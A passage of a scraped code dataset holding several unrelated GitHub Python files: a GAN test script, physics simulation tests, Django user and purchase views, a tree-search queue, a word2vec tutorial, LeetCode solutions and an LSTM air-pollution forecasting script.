time)\n plist[j].numFault += 1\n plist[j].nRef(A[j], B[j], C[j])\n\n indexTrack = 1\n\n for p in plist:\n if p.numEvict == 0:\n print(\"Process \", indexTrack, \" had \", p.numFault, \" faults.\")\n print(\"\\tWith no evictions, the average residence is undefined.\")\n else:\n print(\"Process \", indexTrack, \" had \", p.numFault, \" faults and \", p.resTime/p.numEvict, \" average residency.\")\n\n totalFault += p.numFault\n totalRes += p.resTime\n totalEvict += p.numEvict\n indexTrack += 1\n\n if totalEvict == 0:\n print(\"The total number of faults is \", totalFault, \".\")\n print(\"\\tWith no evictions, the overall average residency is undefined.\")\n else:\n print(\"The total number of faults is \", totalFault, \" and the overall average residency is \", totalRes/totalEvict, \".\")\n\n\nmain()\n","repo_name":"MKagesawa/demandPaging","sub_path":"demandPaging.py","file_name":"demandPaging.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25935666182","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nfrom Dataset import createDataset\nfrom Network import Generator, Discriminator\nfrom Loss import LossGenerator, LossDiscriminator\nimport argparse\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='''Show the output of trained TP-GAN on the input images.\n Input is not sanitized, please be nice. ''')\n parser.add_argument('-l', '--img-list', type=str, default='image_list_reduced.yml', help='yaml file of input processed input images')\n parser.add_argument('-d', '--img-dir', type=str, default='put_cleaned', help='directory of processed input images')\n parser.add_argument('-m', '--model', type=str, default='model_generator_20.pth', help='path to generator checkpoint')\n parser.add_argument('-o', '--output', type=str, default='image.png', help='path to save image output')\n parser.add_argument('-c', action='store_true', default=False, help='cpu only (no cuda)')\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n\n args = parse_args()\n\n print('Starting...')\n\n _, testSet = createDataset(args.img_list, args.img_dir, 1)\n testloader = torch.utils.data.DataLoader(testSet, batch_size = 1, shuffle = False, num_workers = 1, pin_memory = True)\n\n print('Dataset initialized')\n if not(args.c):\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n if args.c:\n G = Generator(noise_dim = 64, num_classes = 100)\n G.load_state_dict(torch.load(args.model))\n else:\n G = torch.nn.DataParallel(Generator(noise_dim = 64, num_classes = 100)).to(device)\n G.module.load_state_dict(torch.load(args.model))\n \n print('Network created')\n\n \n\n print('Finished loading checkpoints')\n\n G.eval()\n\n img_list = list()\n toPIL = transforms.ToPILImage()\n \n\n for batch in tqdm(testloader):\n \n noise = torch.FloatTensor(np.random.normal(0,0.02,(len(batch['img128']), 64))).to(device)\n img128_fake, img64_fake, img32_fake, encoder_predict, local_fake, left_eye_fake, right_eye_fake, nose_fake, mouth_fake, local_GT = \\\n G(batch['img128'], batch['img64'], batch['img32'], batch['left_eye'], batch['right_eye'], batch['nose'], batch['mouth'], noise)\n\n img_list.append({'input': toPIL(batch['img128'].detach().cpu().reshape(*batch['img128'].shape[1:])), \n 'fake': 
toPIL(img128_fake.detach().cpu().reshape(*img128_fake.shape[1:])), \n 'GT': toPIL(batch['img128GT'].detach().cpu().reshape(*batch['img128GT'].shape[1:])), \n 'local': toPIL(local_fake.detach().cpu().reshape(*local_fake.shape[1:]))})\n\n \n columns = 4\n rows = min(10, len(img_list))\n fig=plt.figure(figsize=(16, 4 * rows))\n for i in range(rows):\n images = img_list[i]\n img = images['input']\n fig.add_subplot(rows, columns, 1 + 4*i)\n plt.imshow(img)\n img = images['fake']\n fig.add_subplot(rows, columns, 2 + 4*i)\n plt.imshow(img)\n img = images['local']\n fig.add_subplot(rows, columns, 3 + 4*i)\n plt.imshow(img)\n img = images['GT']\n fig.add_subplot(rows, columns, 4 + 4*i)\n plt.imshow(img)\n plt.tight_layout()\n if args.output != '':\n try:\n fig.savefig(args.output)\n except Exception as e:\n print(\"Couldn't save figure : {}\".format(e))\n plt.show()","repo_name":"UnrealLink/TP-GAN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"70549118274","text":"def f(n, last):\n if n <= last:\n if n == nums[2] or n == nums[3]:\n return n\n else:\n a = f(n*2, last)\n b = f(n*2+1, last)\n if a != 0 and b != 0:\n return n\n else:\n return max(a, b)\n return 0\ndef height(n):\n p = n\n cnt = 0\n cnt2 = 0\n c1 = ch1[p]\n while c1 != 0:\n cnt += 1\n p = c1\n p = n\n c2 = ch2[p]\n while c2 != 0:\n cnt2 += 1\n p = c2\n return max(cnt, cnt2)\nT = int(input())\nfor tc in range(1, T+1):\n nums = list(map(int, input().split()))\n V = nums[0]\n E = nums[1]\n nn = list(map(int, input().split()))\n ch1 = [0]*(V+1)\n ch2 = [0]*(V+1)\n tree = [0]*(V+1)\n for i in range(V-1):\n if ch1[nn[i*2]] == 0:\n ch1[nn[i*2]] = nn[i*2+1]\n else:\n ch2[nn[i * 2]] = nn[i * 2 + 1]\n for i in range(V-1):\n tree[nn[i*2]] = nn[i*2+1]\n n = f(1, V)\n ans = height(n)\n print('#{} {} {}'.format(tc, n, ans))","repo_name":"bumbum9944/bumpycharm","sub_path":"0910/공통조상.py","file_name":"공통조상.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35192012732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 22 19:33:26 2018\n\n@author: xuyuan\n\"\"\"\nimport numpy as np\na=[1,2,3]\nb=[3,4,5]\nc=[a,b]\nc=np.array(c)\nprint(np.random.uniform(size=5))\na=np.array(a)\n\n\n#kinds={'ASW':1,'YRI':2,'ACB':3,'ESN':4,'GWD':5,'LEK':6,'MSL':7}\n#print(kinds.keys())","repo_name":"yuanXuX/CS168MINIpro","sub_path":"minipro4/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087949138","text":"from __future__ import print_function\n\nimport mceq_config as config\nfrom MCEq.core import MCEqRun\nimport crflux.models as pm\nimport numpy as np\n\nimport pytest\nimport sys\n\nif sys.platform.startswith(\"win\") and sys.maxsize <= 2**32:\n pytest.skip(\"Skip model test on 32-bit Windows.\", allow_module_level=True)\n\ndef format_8_digits(a_list):\n return [\"%.8e\" % member for member in a_list]\n\nconfig.debug_level = 1\nconfig.kernel_config = 'numpy'\nconfig.cuda_gpu_id = 0\nif config.has_mkl:\n config.set_mkl_threads(2)\n\n\nmceq = MCEqRun(\n interaction_model='SIBYLL23C',\n theta_deg=0.,\n primary_model=(pm.HillasGaisser2012, 'H3a'))\n\n\ndef test_config_and_file_download():\n import mceq_config as config\n import os\n # Import of config triggers data download\n assert 
config.mceq_db_fname in os.listdir(config.data_dir)\n\n\n\ndef test_some_angles():\n\n nmu = []\n for theta in [0., 30., 60., 90]:\n mceq.set_theta_deg(theta)\n mceq.solve()\n nmu.append(\n np.sum(\n mceq.get_solution('mu+', mag=0, integrate=True) +\n mceq.get_solution('mu-', mag=0, integrate=True)))\n assert format_8_digits(nmu) == ['5.62504370e-03', '4.20479234e-03', '1.36630552e-03', '8.20255259e-06']\n\n\ndef test_switch_interaction_models():\n mlist = [\n 'DPMJETIII191',\n 'DPMJETIII306',\n 'QGSJET01C',\n 'QGSJETII03',\n 'QGSJETII04',\n 'SIBYLL21',\n 'SIBYLL23',\n 'SIBYLL23C03',\n 'SIBYLL23C',\n 'SIBYLL23CPP']\n count_part = []\n for m in mlist:\n mceq.set_interaction_model(m)\n count_part.append(len(mceq._particle_list))\n assert(count_part == [64, 64, 58, 44, 44, 48, 62, 62, 62, 62])\n\n\ndef test_single_primary():\n energies = [1e3, 1e6, 1e9, 5e10]\n nmu, nnumu, nnue = [], [], []\n mceq.set_interaction_model('SIBYLL23C')\n mceq.set_theta_deg(0.)\n for e in energies:\n mceq.set_single_primary_particle(E=e, pdg_id=2212)\n mceq.solve()\n nmu.append(\n np.sum(\n mceq.get_solution('mu+', mag=0, integrate=True) +\n mceq.get_solution('mu-', mag=0, integrate=True)))\n nnumu.append(\n np.sum(\n mceq.get_solution('numu', mag=0, integrate=True) +\n mceq.get_solution('antinumu', mag=0, integrate=True)))\n nnue.append(\n np.sum(\n mceq.get_solution('nue', mag=0, integrate=True) +\n mceq.get_solution('antinue', mag=0, integrate=True)))\n assert format_8_digits(nmu) == ['2.03134720e+01', '1.20365838e+04', '7.09254150e+06', '2.63982133e+08']\n assert format_8_digits(nnumu) == ['6.80367347e+01', '2.53158948e+04', '1.20884925e+07', '4.14935240e+08']\n assert format_8_digits(nnue) == ['2.36908717e+01', '6.91213253e+03', '2.87396649e+06', '9.27683105e+07']\n\n","repo_name":"mceq-project/MCEq","sub_path":"MCEq/tests/test_mceq.py","file_name":"test_mceq.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"1433029214","text":"\"\"\"Views from the main app\"\"\"\nimport logging\n\nfrom django.db import IntegrityError\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .models import CustomUser\nfrom .serializers import CustomUserBaseSerializer, CustomUserFullSerializer\nfrom .managers import UserManager\nfrom .exceptions import PasswordException, ActionForbiddenException\n\nlogger = logging.getLogger('api_crud')\n\nclass UserView(APIView):\n \"\"\"Need to be logged in to perform any HTTP request\"\"\"\n permission_classes = (IsAuthenticated,)\n\n @staticmethod\n def get(request, uuid):\n \"\"\"GET method that obtains a user from the DB.\n If user is admin or getting self info gets full data,\n otherwise will get basic data\"\"\"\n user = CustomUser.objects.get(uuid=uuid)\n\n if request.user.is_staff or user.username == request.user.username:\n serializer = CustomUserFullSerializer(user)\n else:\n serializer = CustomUserBaseSerializer(user)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n @staticmethod\n def post(request):\n \"\"\"POST method to create a new user\"\"\"\n try:\n\n user = UserManager.create_user(request)\n serializer = CustomUserFullSerializer(user)\n\n return Response(data=serializer.data, status=status.HTTP_201_CREATED)\n\n except (PasswordException, ActionForbiddenException) as message:\n return Response(data={'message': 
str(message)}, status=status.HTTP_400_BAD_REQUEST)\n except IntegrityError as integrity_error:\n return Response(data={'message': str(integrity_error)},\n status=status.HTTP_400_BAD_REQUEST)\n except Exception as exc:\n logger.error(str(exc))\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @staticmethod\n def put(request, uuid):\n \"\"\"PUT method to update an existing user\"\"\"\n try:\n custom_user = CustomUser.objects.update_user(request, uuid)\n serializer = CustomUserFullSerializer(custom_user)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n except ActionForbiddenException as message:\n return Response(data={'message': str(message)}, status=status.HTTP_400_BAD_REQUEST)\n\n @staticmethod\n def delete(request, uuid):\n \"\"\"DELETE method to delete a user\"\"\"\n try:\n UserManager.delete_user(request, uuid)\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n except ActionForbiddenException as message:\n return Response(data={'message': str(message)}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"kumagaepatricio/api_crud","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2014405399","text":"from sys import stdout\nfrom collections import deque\nfrom utils.misc import INF\n\nfrom opt.solver import Solver, Plugin\n\nfrom .node import TreeNode\n\n\nclass NodeQueue(deque):\n \"\"\"\n Base class for node queue classes. This is where the tree search stores nodes for later\n exploration. The policies defining how to put and get nodes from the queue basically\n determine the exploration order of the nodes. See DFS_NodeQueue and BFS_NodeQueue for\n the simplest examples.\n \"\"\"\n def put(self, elem):\n raise NotImplementedError()\n\n def get(self):\n raise NotImplementedError()\n\n def prune(self, cutoff, is_better):\n for _ in xrange(len(self)):\n elem = self[0]\n if isinstance(elem, TreeNode):\n node = elem\n else:\n node, branch = elem\n if is_better(node.bound(), cutoff):\n self.rotate(-1)\n else:\n self.popleft()\n\n def pprint(self, start=0, n=INF, ostream=stdout):\n \"\"\"Starting from index 'start', print 'n' elements in the queue.\"\"\"\n for x in xrange(start, min(start + n, len(self))):\n ostream.write(\"\\t{} :: {}\\n\".format(x, self[x]))\n\n def pprint_start(self, n=10, ostream=stdout):\n \"\"\"Print the first n elements in the queue.\"\"\"\n n = min(n, len(self))\n ostream.write(\"Showing first {} elements in the queue\\n\".format(n))\n self.pprint(0, n, ostream)\n\n def pprint_end(self, n=10, ostream=stdout):\n \"\"\"Print the last n elements in the queue.\"\"\"\n n = min(n, len(self))\n ostream.write(\"Showing last {} elements in the queue\\n\".format(n))\n self.pprint(len(self)-n, n, ostream)\n\n def pprint_edges(self, n=5, ostream=stdout):\n \"\"\"Print the first and last n elements in the queue.\"\"\"\n if len(self) <= 2 * n:\n ostream.write(\"Showing all elements\\n\")\n self.pprint(0, len(self), ostream)\n else:\n self.pprint_start(n, ostream)\n self.pprint_end(n, ostream)\n\n\nclass DFS_NodeQueue(NodeQueue):\n put = NodeQueue.append\n get = NodeQueue.pop\n\n\nclass BFS_NodeQueue(NodeQueue):\n put = NodeQueue.append\n get = NodeQueue.popleft\n\n\nNodeQueue.DFS = DFS_NodeQueue\nNodeQueue.BFS = BFS_NodeQueue\n\n\nclass CheckQueue(Plugin):\n \"\"\"\n This solver plugin is automatically included in queue-based tree search solvers. 
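 (Usage sketch, inferred from the class body below rather than stated by the
 original author: the plugin's signal_map binds Solver.SIGNALS.ITERATION_FINISHED
 to check(), so once the plugin is attached to a solver no manual call is needed;
 check() then emits EMPTY_QUEUE and requests Solver.ACTION.FINISH.)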
It checks,\n at the end of each iteration, if the node queue is empty. When the queue becomes empty, the\n solver is interrupted and the search finishes.\n \"\"\"\n EMPTY_QUEUE = \"node queue is empty\"\n\n signal_map = {Solver.SIGNALS.ITERATION_FINISHED: \"check\"}\n emits = {EMPTY_QUEUE}\n\n def check(self, listener):\n if len(self.solver.queue) == 0:\n self.solver.channel.emit(self.EMPTY_QUEUE)\n self.solver.interrupts.add(\"node queue is empty\", Solver.ACTION.FINISH)\n","repo_name":"2xR/legacy","sub_path":"opt/treesearch/_queuebased/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28983543784","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom control_inventario import models\nimport json\n\nfrom django.contrib.auth.decorators import login_required\n\n\ndef update_compra_list(emp):\n compra_list = emp.compra_set.values().order_by(\"fecha\")\n for compra in compra_list:\n compra['tipo_comprobante'] = models.TipoComprobante.objects.get(id=compra[\"tipo_comprobante_id\"]).denominacion\n compra['proveedor'] = models.Proveedor.objects.get(id=compra[\"proveedor_id\"]).nombre\n return compra_list\n\n\n@login_required(login_url='/ingresar')\ndef resumen_compra(request):\n id_empresa = request.session['empresa'][\"id\"]\n mes = request.session[\"mes\"]\n emp = models.Empresa.objects.get(id=id_empresa)\n\n comprobante_list = models.TipoComprobante.objects.values()\n cliente_list = emp.cliente_set.values()\n compra_list = update_compra_list(emp)\n tipo_operacion_list = models.TipoOperacion.objects.values()\n\n args = {}\n args[\"comprobante_list\"] = comprobante_list\n args[\"cliente_list\"] = cliente_list\n args[\"compra_list\"] = compra_list\n args[\"tipo_operacion_list\"] = tipo_operacion_list\n return render_to_response('resumen_compras/main.html', args, context_instance=RequestContext(request))\n\ndef detalle_compra(request):\n datos = request.POST\n d_list = []\n if datos:\n id_compra = datos.get(\"id_compra\")\n detalles_list = models.DetalleCompra.objects.filter(compra_id=id_compra).values()\n for i in detalles_list:\n i[\"valor_unitario\"] = float(i['valor_unitario'])\n i[\"importe\"] = float(i['importe'])\n i[\"igv\"] = float(i['igv'])\n i[\"valor_venta\"] = float(i['valor_venta'])\n prod = models.Producto.objects.get(id=i['producto_id'])\n i['codigo'] = prod.codigo\n d_list.append(i)\n\n args = {}\n args['d_list'] = d_list\n args['success'] = True\n json_data = json.dumps(args)\n return HttpResponse(json_data, mimetype=\"application/json\")\n","repo_name":"jink8904/mysite","sub_path":"control_inventario/app/resumen_compras/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39287007678","text":"# coding=utf-8\n# These are all the modules we'll be using later. 
Make sure you can import them\n# before proceeding further.\nfrom __future__ import print_function\nimport collections\nimport math\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport zipfile\nfrom matplotlib import pylab\nfrom six.moves import range\nfrom six.moves.urllib.request import urlretrieve\nfrom sklearn.manifold import TSNE\n\n\ndef read_data(filename):\n \"\"\"Extract the first file enclosed in a zip file as a list of words\"\"\"\n with zipfile.ZipFile(filename) as f:\n data = tf.compat.as_str(f.read(f.namelist()[0])).split()\n return data\n\nwords = read_data(\"text8.zip\")\nprint('Data size %d' % len(words))\n\nvocabulary_size = 50000\n\n\ndef build_dataset(words):\n \"\"\"\n Take the vocabulary_size most frequent words from the corpus and number them; then index every word in the corpus by that numbering.\n Words that are not in the vocabulary get index 0.\n :param words: the corpus\n :return:\n \"\"\"\n count = [['UNK', -1]]\n # Count word frequencies in the corpus and keep the vocabulary_size most frequent words.\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n # Build the word index: number the vocabulary_size words from most to least frequent and store them in a dict. This is the vocabulary.\n for word, _ in count:\n dictionary[word] = len(dictionary)\n # holds the index assigned to each word\n data = list()\n unk_count = 0\n # Encode every word of the corpus with its index from dictionary; words that are absent are marked 0, i.e. low-frequency words are replaced by UNK.\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n # words missing from the dictionary are treated as UNK\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n\n count[0][1] = unk_count\n # convert to [index, word] pairs: the reverse vocabulary\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n return data, count, dictionary, reverse_dictionary\n\ndata, count, dictionary, reverse_dictionary = build_dataset(words)\nprint('Most common words (+UNK)', count[:5])\nprint('Sample data', data[:10])\nprint('Sample reverse_dictionary', [reverse_dictionary[i] for i in data[:10]])\ndel words # Hint to reduce memory.\n\ndata_index = 0\n\n\ndef generate_batch(batch_size, num_skips, skip_window):\n \"\"\"\n batch_size is the number of samples per scan, skip_window is the span of left/right context words, and num_skips is how many times each input word is reused.\n :param batch_size:\n :param num_skips:\n :param skip_window:\n :return:\n \"\"\"\n global data_index\n assert batch_size % num_skips == 0\n assert num_skips <= 2 * skip_window\n # holds the data for each batch\n batch = np.ndarray(shape=(batch_size), dtype=np.int32)\n labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)\n span = 2 * skip_window + 1 # [ skip_window target skip_window ]\n # create a double-ended queue (deque) of length span\n buffer = collections.deque(maxlen=span)\n for _ in range(span):\n buffer.append(data[data_index])\n data_index = (data_index + 1) % len(data)\n\n print('data_index', data_index)\n print('buffer_init:')\n for i in buffer:\n print(reverse_dictionary[i],)\n\n for i in range(batch_size // num_skips):\n target = skip_window # target label at the center of the buffer\n targets_to_avoid = [skip_window]\n print('target_int, target_to_avoid_init', target, targets_to_avoid)\n for j in range(num_skips):\n while target in targets_to_avoid:\n target = random.randint(0, span - 1)\n print('target_runing', target)\n targets_to_avoid.append(target)\n print('targets_to_avoid_runing', targets_to_avoid)\n batch[i * num_skips + j] = buffer[skip_window]\n labels[i * num_skips + j, 0] = buffer[target]\n buffer.append(data[data_index])\n print('buffer______runing')\n for k in buffer:\n print(reverse_dictionary[k],)\n data_index = (data_index + 1) % len(data)\n print('data_index', data_index)\n return batch, labels\n\nprint('data:', [reverse_dictionary[di] for di in data[:16]])\n\nfor num_skips, skip_window in [(2, 1), (4, 2)]:\n batch, labels = 
generate_batch(batch_size=8, num_skips=num_skips, skip_window=skip_window)\n print('\\nwith num_skips = %d and skip_window = %d:' % (num_skips, skip_window))\n print(' batch:', [reverse_dictionary[bi] for bi in batch])\n print(' labels:', [reverse_dictionary[li] for li in labels.reshape(8)])\n\n# for _ in range(3):\n# batch_size = 8\n# num_skips = 2\n# skip_window = 1\n# batch_data, batch_labels = generate_batch(batch_size, num_skips, skip_window)\n# print('\\nwith num_skips = %d and skip_window = %d:' % (num_skips, skip_window))\n# print(' batch:', [reverse_dictionary[bi] for bi in batch_data])\n# print(' labels:', [reverse_dictionary[li] for li in batch_labels.reshape(batch_size)])\n\nbatch_size = 128\nembedding_size = 128 # Dimension of the embedding vector.\nskip_window = 1 # How many words to consider left and right.\nnum_skips = 2 # How many times to reuse an input to generate a label.\n# We pick a random validation set to sample nearest neighbors. here we limit the\n# validation samples to the words that have a low numeric ID, which by\n# construction are also the most frequent.\nvalid_size = 16 # Random set of words to evaluate similarity on.\nvalid_window = 100 # Only pick dev samples in the head of the distribution.\nvalid_examples = np.array(random.sample(range(valid_window), valid_size))\nnum_sampled = 64 # Number of negative examples to sample.\n\ngraph = tf.Graph()\n\nwith graph.as_default(), tf.device('/cpu:0'):\n # Input data.\n train_dataset = tf.placeholder(tf.int32, shape=[batch_size])\n train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n valid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n\n # Variables.\n embeddings = tf.Variable(\n tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))\n softmax_weights = tf.Variable(\n tf.truncated_normal([vocabulary_size, embedding_size],\n stddev=1.0 / math.sqrt(embedding_size)))\n softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))\n\n # Model.\n # Look up embeddings for inputs.\n embed = tf.nn.embedding_lookup(embeddings, train_dataset)\n # Compute the softmax loss, using a sample of the negative labels each time.\n loss = tf.reduce_mean(\n tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,\n labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))\n\n # Optimizer.\n # Note: The optimizer will optimize the softmax_weights AND the embeddings.\n # This is because the embeddings are defined as a variable quantity and the\n # optimizer's `minimize` method will by default modify all variable quantities\n # that contribute to the tensor it is passed.\n # See docs on `tf.train.Optimizer.minimize()` for more details.\n optimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)\n\n # Compute the similarity between minibatch examples and all embeddings.\n # We use the cosine distance:\n norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))\n normalized_embeddings = embeddings / norm\n valid_embeddings = tf.nn.embedding_lookup(\n normalized_embeddings, valid_dataset)\n similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))\n\n#\n# num_steps = 100001\n#\n# with tf.Session(graph=graph) as session:\n# tf.global_variables_initializer().run()\n# print('Initialized')\n# average_loss = 0\n# for step in range(num_steps):\n# batch_data, batch_labels = generate_batch(\n# batch_size, num_skips, skip_window)\n# feed_dict = {train_dataset : batch_data, train_labels : batch_labels}\n# _, l = session.run([optimizer, loss], 
feed_dict=feed_dict)\n# average_loss += l\n# if step % 2000 == 0:\n# if step > 0:\n# average_loss = average_loss / 2000\n# # The average loss is an estimate of the loss over the last 2000 batches.\n# print('Average loss at step %d: %f' % (step, average_loss))\n# average_loss = 0\n# # note that this is expensive (~20% slowdown if computed every 500 steps)\n# if step % 10000 == 0:\n# sim = similarity.eval()\n# for i in range(valid_size):\n# valid_word = reverse_dictionary[valid_examples[i]]\n# top_k = 8 # number of nearest neighbors\n# nearest = (-sim[i, :]).argsort()[1:top_k+1]\n# log = 'Nearest to %s:' % valid_word\n# for k in range(top_k):\n# close_word = reverse_dictionary[nearest[k]]\n# log = '%s %s,' % (log, close_word)\n# print(log)\n# final_embeddings = normalized_embeddings.eval()","repo_name":"STHSF/DeepLearning","sub_path":"word2vec/word2vec_skip_gram.py","file_name":"word2vec_skip_gram.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"36226834089","text":"def fetch_input():\n data = []\n with open('input.txt', 'r') as file:\n data = file.read()\n return data.split(\"\\n\")\n\ndef parse_input_to_map(input):\n result = {}\n for line in input:\n fields = line.split(\"contain \")\n key_values = fields[0].split(\" \")\n key = key_values[0] + \" \" + key_values[1]\n value = []\n if not \"no other bags\" in fields[1]:\n bags = fields[1].split(\", \")\n for bag in bags:\n words = bag.split(\" \")\n count = int(words[0])\n color = words[1] + \" \" + words[2]\n value.append({\"count\": count, \"color\": color})\n result[key] = value\n return result\n\ndef can_contain(data, curr_key, to_find):\n if curr_key == to_find:\n return True\n if (len(data[curr_key]) == 0):\n return False\n result = False\n for bag in data[curr_key]:\n result |= can_contain(data, bag[\"color\"], to_find)\n return result\n \n\ndef search_for_color(data, to_find):\n print(data)\n count = 0\n for key in data.keys():\n if key != to_find and can_contain(data, key, to_find):\n count += 1\n print(count)\n\ndef main():\n input = fetch_input()\n data = parse_input_to_map(input)\n results = search_for_color(data, \"shiny gold\")\n\nmain()\n","repo_name":"chrisfisch914/AdventOfCode2020","sub_path":"Day7/day7-1.py","file_name":"day7-1.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32224856531","text":"# Definition for a binary tree node.\nfrom typing import Optional\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \nclass Solution:\n def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n def traverse(curNode):\n if curNode is None:\n return []\n else:\n return traverse(curNode.left) + [ curNode.val] + traverse(curNode.right)\n nums = traverse(root)\n nums.sort() \n ans = nums[1] - nums[0]\n for i in range(2, len(nums)):\n ans = min(ans, nums[i] - nums[i-1])\n return ans\n \n \n ","repo_name":"chrisbyd/leetcode_chris","sub_path":"sorting/530.py","file_name":"530.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39397849258","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n row, col, maxarea = len(grid), len(grid[0]), 0\n checked = set()\n\n def area(x, y):\n if (not(0 <= x < row and 0 <= y < 
col)) or (x, y) in checked or (grid[x][y] == 0):\n return 0\n checked.add((x, y))\n return 1 + area(x, y-1) + area(x-1, y) + area(x, y+1) + area(x+1, y)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n maxarea = max(area(i, j), maxarea)\n\n return maxarea\n","repo_name":"Otabek8866/my-leetcode-solutions","sub_path":"Algrithms-Level-1/day-7/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10760076972","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM,GRU,SimpleRNN\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.optimizers import RMSprop, SGD , Adagrad , Adam\nfrom keras.layers import Input, Flatten, Dropout, Activation,BatchNormalization\nfrom keras.models import load_model\nfrom impyute.imputation.cs import mice\nimport sys\nfrom impyute.imputation.cs import fast_knn\nsys.setrecursionlimit(1000000) #Increase the recursion limit of the OS\n\n\nMISS_LEN = 0.2\n\ndef corrupt_data_set(dataset):\n data_corrupted = np.copy(dataset)\n for i in range(np.shape(dataset)[1]):\n column = np.copy(dataset[:,i])\n missing_pct = int(column.size * MISS_LEN)\n j = [random.choice(range(column.shape[0])) for _ in range(missing_pct)]\n column[j] = np.NaN\n data_corrupted[:,i] = column\n return data_corrupted\n \ndef create_dataset(dataset, look_back=11):\n data_x, data_y = [], []\n data_corrupted = np.array([])\n data_corrupted = np.float64(corrupt_data_set(dataset))\n imputed_training = mice(data_corrupted) \n for i in range(15000):\n data_x.append(imputed_training[i:i+look_back,:])\n data_y.append(imputed_training[i+look_back,0])\n data_x = np.array(data_x)\n data_y = np.array(data_y)\n return data_x[0:12000,:],data_x[12000:15000,:],data_y[0:12000],data_y[12000:15000]\n\n\n\ndata = np.load('polution_dataSet.npy')\nscaler = MinMaxScaler(feature_range=(0, 1))\ndata = scaler.fit_transform(data)\nx_train,x_test,y_train,y_test = create_dataset(data,11)\n\n\nmodel = Sequential()\nmodel.add(LSTM(16,input_shape=(11, 8)))\nmodel.add(Dense(16))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_absolute_error', optimizer=\"RMSprop\")\nhist = model.fit(x_train, y_train, epochs=65, batch_size=128, validation_split = 0.2, verbose=1)\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title('Daily Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper right')\nplt.show()\n\n\n\nfig_Accuracy = plt.figure(figsize=(25, 6))\ny_pred=model.predict(x_test)\nreal_daily_stat = []\npredicted_daily_stat = []\nfor i in range(len(y_pred)):\n if(i%12==0):\n real_daily_stat.append(y_test[i])\n predicted_daily_stat.append(y_pred[i])\nplt.plot(real_daily_stat, label= 'real pollution')\nplt.plot(predicted_daily_stat, label = 'pollution 